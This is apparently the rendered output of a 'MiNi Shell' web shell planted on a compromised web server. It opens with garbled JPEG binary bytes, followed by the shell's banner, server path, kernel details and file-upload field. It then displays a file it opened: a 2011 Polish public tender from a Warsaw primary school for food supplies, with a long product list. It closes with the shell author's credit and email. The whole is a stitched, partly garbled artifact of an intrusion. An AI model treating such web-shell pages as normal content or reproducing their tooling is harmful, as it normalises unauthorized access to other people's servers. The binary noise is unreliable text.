JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/341903-N-2011.html

<p class="kh_header"><b>Warszawa: Zakup i dostawę różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 341903 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 211 z Oddziałami Integracyjnymi im. Janusza Korczaka , ul. Nowy Świat 21A, 00-029 Warszawa, woj. mazowieckie, tel. 22 826 17 47, faks 22 826 17 47.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	BUŁKA TARTA, OPAK. TORBA FOLIOWA O POJ 1,8 KG	szt.	50
2	RYŻ PARABOLICZNY, OPAK. TORBA FOLIOWA O POJ.5,0 KG	szt.	40
3	MĄKA PSZENNA, OPAK. TORBA PAPIEROWA O POJ.1 KG	szt.	110
4	PASZTECIK PODLASKI 195 G	szt.	72
5	OLEJ KUJAWSKI, BUT.PLAST. O POJ. 3 L	szt	65
6	KAWA INKA 150G	szt.	14
7	KASZA MANNA1 KG	kg	20
8	SÓL 1 KG	szt	132
9	SOK MALINOWY, SZKLANA BUTELKA  O POJ. 420 ML	szt	80
10	KISIEL OWOCOWY(RÓŻNE SMAKI) BEZ CUKRU 1,3 kg	szt.	60
11	BUDYŃ (RÓŻNE SMAKI) BEZ CUKRU, 1,3 kg	szt	256
12	GALARETKA  (RÓŻNE SMAKI)  1,3 KG	szt	25
13	BARSZCZ BIAŁY OPAK. PLAST. PUDEŁKO O POJ.1 KG	szt	10
14	OLIWA Z OLIWEK Z PIERWSZEGO TŁOCZENIA W SZKLANEJ BUTELCE O POJ. 1 L	litr	6
15	NAPÓJ CZEKOLADOWY 1 KG	kg	4
16	POWIDŁA ŚLIWKOWE, 290G	szt	50
17	ŚLIWKI Z CZEKOLADZIE 1 kg	kg.	40
18	KAKAO NESQUIK, 600 G	szt.	18
19	KONCENTRAT POMIDOROWY 1 KG	szt	35
20	KETCHUP ŁAGODNY 1 l	szt	15
21	MUSZTARDA 180 G	szt.	10
22	DŻEM (RÓŻNE SMAKI) SŁOIK 280 G	szt.	88
23	MIÓD SPADZIOWY SŁOIK 400 G	kg	35
24	MAJONEZ DEKORACYJNY SŁOIK 700 ML	szt.	30
25	RODZYNKI 100G	szt	240
26	TUŃCZYK W SOSIE WŁASNYM, 170g	szt	30
27	SZCZAW KONSEROWOWY , SŁOIK 300 ML, 	szt.	80
28	GROCH ŁUSKANY, TORBA FOLIOWA O POJ.5 KG	szt	5
29	FASOLA BIAŁA, GRUBY JAŚ, OPAK. TORBA FOLIOWA O POJ. 5 KG	szt	3
30	KASZA PĄCZAK, 5kg	szt	10
31	KASZA GRYCZANA, OPAK. TORBA FOLIOWA O POJ. 5 KG	kg	50
32	KASZA JĘCZMIENNA, OPAK. TORBA FOLIOWA O POJ. 5 KG	kg	20
33	CHRZAN SŁOIK 200 G	szt	12
34	KUKURYDZA KONSERWOWA 425 ml	szt	30
35	ANANAS KONSERWOWY 565 ml	szt.	20
36	FASOLA KONSERWOWA CZERWONA 425 ml	szt	10
37	BRZOSKWINIA W PUSZCZCE 850 ml 	szt.	10
38	NUTELLA SŁOIK 630G	szt.	14
39	CUKIER WANILIOWY 32 G	szt.	30
40	CUKIER PUDER 0,5 KG	szt.	22
41	CUKIER KRYSZTAŁ 1 KG	kg	300
42	NAPOJE HERBACIANE OPAKOWANIA 1,3 KG	kg	33
43	SÓL ZIOŁOWA 1 KG	kg	2
44	MAKARON ŚWIDERKI, OPAKOWANIE FOLIOWE O POJ. 2 KG	szt.	30
45	MAKARON SPAGHETTI OPAKOWANIE FOLIOWE O POJ. 1 KG	szt. 	135
46	MAKARON ALFABETTO OPAKOWANIE FOLIOWE O POJ. 3 KG	szt.	16
47	MAKARON ŁAZANKI OPAKOWANIE FOLIOWE O POJ. 2 KG	szt.	14
48	MAKARON KOKARDKI OPAKOWANIE FOLIOWE O POJ. 2 KG	szt	15
49	MAKARON RURKA - PENNE OPAKOWANIE FOLIOWQE O POJ. 2 KG	szt.	15
50	MAKARON NITKA ROSOŁOWA OPAKOWANIE O POJ. 2 KG	szt.	25
51	BAZYLIA, 300 G	szt.	2
52	CURRY, 900G	szt.	4
53	CZOSNEK GRANULOWANY, 01 KG	szt.	2
54	GAŁKA MUSZKATOŁOWA, 1 KG	kg	1
55	IMBIR MIELONY, 600 G	szt.	1
56	MAJERANEK OTARTY, 150 G	szt	12
57	PIEPRZ ZIOŁOWY, 600 G	szt. 	3
58	PIEPRZ CZARNY ZIARNO,  900G	szt.	1
59	PIEPRZ KOLOROWY ZIARNO, 600 G	szt.	2
60	PAPRYKA SŁODKA MIELONA, 800G	szt.	3
61	PIEPRZ CZARNY MIELONY, 1 KG	szt	2
62	KURKUMA, 1 KG	szt	1
63	LIŚĆ LAUROWY, 100G	szt	3
64	TYMIANEK, 300 G	szt	1
65	ZIELE ANGIELSKIE, 600 G	szt	1
66	POMIDORY SUSZONE W OLEJU, 670 G	szt	4
67	SOSY DESEROWE(RÓŻNE SMAKI) BUTELKA O POJ.1 L	szt	20
68	PRZYPRAWA W PŁYNIE, 960 ML	szt	8
69	PRZYPRAWA DO KURCZAKA, 1 KG	szt	2
70	PRZYPRAWA DO MIĘSA MIELONEGO, 1 KG	szt	1
71	PRZYPRAWA DO MIĘSA WIEPRZOWEGO, 870G	szt	1
72	PRZYPRAWA DO RYB, 800G	szt	1
73	PŁATKI CINICMINIS,225 G	szt	40
74	PŁATKI GOLD FLAKES, 250 G	szt	14
75	PŁATKI KUKURYDZIANE, 1 KG	szt	7
76	PŁATKI CHERIOS, 225 G	szt	8
77	PŁATKI KANGUS, 250 G	szt	16
78	PŁATKI CHOCAPIC, 500G	szt	16
79	PŁATKI NESQUIK, 500G	szt	8
80	PŁATKI MLEKOŁAKI, 250 G	szt	100
81	SOS CYGAŃSKI, 850 G	szt	1
82	SOS DO SPAGHETTI BOLOGNE, 1 KG	szt	20
83	SOS GRZYBY LEŚNE, 900G	szt	6
84	SOS MYŚLIWSKI, 900 G	szt	1
85	SOS HOLENDERSKI, 750 G	szt	1
86	SOS 4 SERY Z BROKUŁAMI, 750 G	szt	4
87	SOS SAŁATKOWY GRECKI, 700 G	szt	1
88	SOS SAŁATKOWY BAZYLIOWO- CZOSNKOWY	szt	1
89	ZUPA KREM Z BOROWIKÓW, 950 G	szt	5
90	ŻUREK, 0,9 KG	szt	12
91	HERBATA CZARNA SAGA, 300 T 	szt	7
92	MIKOŁAJE CZEKOLADOWE, 80G	szt	240
93	ZAJĄCE CZEKOLADOWE, 80 G	szt	240
94	NESTEA,500ML	szt	240
95	COCA COLA, 330 ML	szt	240
96	HERBATNIKI OWSIANE 1kg	kg	13
97	BISZKOPTY OKRĄGŁE,140 G	szt	180
98	CZEKOLADA 300 G	szt	40
99	CZEKOLADA, 100 G	szt	240
100	ŻELKI HARIBO, 200 G	szt	240
101	DELICJE, 147 G	szt	78
102	CRUNCHY ŻURAWINA- MALINA, 50 G	szt	480
103	CRUNCHY CZEKOLADA, 70 G	szt	480
104	BATON MILKY WAY 21,5G	szt	240
105	BATON FITNES RÓŻNE SMAKI 23,5 G	szt	480
106	BATON KNOPERS 25G	szt	240
107	BATON GRZESIEK 39 G	szt	280
108	MLECZNA KANAPKA 28G	szt	2800
109	BATON KIT KAT 4 PALUSZKI 45 G	Szt	420
110	MIESZANKA WEDEL 3 KG	Szt	10
111	PRINCESSA RÓŻNE SMAKI 35G	szt	2400
112	HERBATNIKI PETITKI, 100 G	szt	700
113	PETTITKI LUBISIE	Szt	480
114	HERBATA SAGA OWOCOWA	szt	24
115	MAKRELA WĘDZONA	kg	10.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca we wskazanym zakresie jest zobowiązany wykazać nie później niż na dzień składania ofert spełnianie warunków poprzez złożenie odpowiedniego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca we wskazanym zakresie jest zobowiązany wykazać nie później niż na dzień składania ofert spełnianie warunków poprzez złożenie odpowiedniego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca we wskazanym zakresie jest zobowiązany wykazać nie później niż na dzień składania ofert spełnianie warunków poprzez złożenie odpowiedniego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca we wskazanym zakresie jest zobowiązany wykazać nie później niż na dzień składania ofert spełnianie warunków poprzez złożenie odpowiedniego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca we wskazanym zakresie jest zobowiązany wykazać nie później niż na dzień składania ofert spełnianie warunków poprzez złożenie odpowiedniego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sp211.hg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Nowy Świat 21A
00-029 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 10:05, miejsce: ul. Nowy Świat 21A
00-029 Warszawa	
sekretariat dyrektora Szkoły Podstawowej nr 211
z Oddziałami Integracyjnymi im. J. Korczaka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com